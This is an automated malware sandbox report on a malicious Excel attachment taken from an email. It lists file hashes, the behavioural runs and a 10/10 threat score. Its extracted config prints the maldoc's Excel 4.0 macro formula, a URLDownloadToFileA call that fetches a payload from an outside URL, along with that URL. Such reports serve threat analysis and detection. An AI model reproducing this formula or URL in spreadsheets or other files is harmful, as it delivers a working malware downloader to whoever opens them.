General
-
Target
message__A9E01E9854ADB407C4B191065D99E304B19ECE92_unknown_.eml
-
Size
18KB
-
Sample
210305-fxgct12x66
-
MD5
8a970816192957352df0217bcdb36d4a
-
SHA1
48efc7f8f4f610f4fb7fde597eb026f6d451284d
-
SHA256
6256f4c5ab30074d0e4e26eae4b1feeba98c42f4d3f71b8eb0e86e4990004b3d
-
SHA512
bb979e46337ccede084ce639922c8cbef9c2c9819a6c090c660fb7abda6875a08b09c056d67e3ef18c4241e1b2c57e3cfd2d2465d87905eca0787078a6635ef4
Behavioral task
behavioral1
Sample
document-87247454.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-87247454.xls
Resource
win10v20201028
Malware Config
Extracted
http://ywgiu10zmnwcx03vpnyp.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ywgiu10zmnwcx03vpnyp.com/inda.xls","..\fkruf.djr",0)
Extracted
http://ywgiu10zmnwcx03vpnyp.com/inda.xls
Targets
-
-
Target
document-87247454.xls
-
Size
40KB
-
MD5
e9e5d831d3d478971af9579f7e15722f
-
SHA1
ddccda0b12d0669c3400c9e24f1cc641dc9d128f
-
SHA256
4a62d024a5a5ec539df5c50039879221170a508c74fb29a96ee7c3ff785ba300
-
SHA512
7b6ea9028be2acefeccc7fe406f8c946251b454f31a8220baa8f1254b768a5fe3847d974446eb30821e052e5ce57690e6d7158352ab7381ed6eb54cf427a7b36
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-